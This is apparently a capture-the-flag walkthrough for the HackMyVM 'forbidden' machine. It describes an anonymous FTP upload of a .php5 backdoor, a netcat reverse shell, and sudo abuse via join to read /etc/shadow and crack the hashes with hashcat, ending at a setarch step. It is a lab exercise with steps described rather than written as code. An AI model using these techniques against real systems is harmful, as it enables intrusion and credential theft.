Let’s solve the boot to root machine from Hackmyvm forbidden.
Find the open ports using nmap.
Anonymous FTP login is allowed.
I logged in into FTP using anonymous login and found 3 files: index.html, note.txt and robots.txt
Same files are discovered during enumeration using gobuster, so this means that we can put/write our files on web server.
I tried uploading files with .php extension, but when I tried to access the files from browser, it is not executing the files and I am unable to get the reverse shell. Then I tried extension .php3 it did not work. Then I uploaded a backdoor file with .php5 extension which works for me.
I started the netcat listener on my localhost and got the reverse shell.
From index.html we have potential username “marta”, and in note.txt it is also mentioned about the image files which might contain the password for the user. So I searched for the .jpg file on the machine.There is a file called “TOPSECRETIMAGE.jpg”
I transferred this image on my local machine using nc.
I run exiftool to see if it contains any hidden data also used strings on it, but all this is of no use. Then after some time I tried the image name as password to login as marta. I am able to login as marta.
Used sudo -l command to see what marta user can do on the system
As per gtfobins, we can read files using join, lets try to read /etc/shadow file.
Let’s copy all the hashes on the local machine and user hashcat to crack it with rockyou.txt
It gives me the password for the peter.
The sudo -l shows, peter can run setarch command without password.
According to gtfobins we can run commands with setarch.
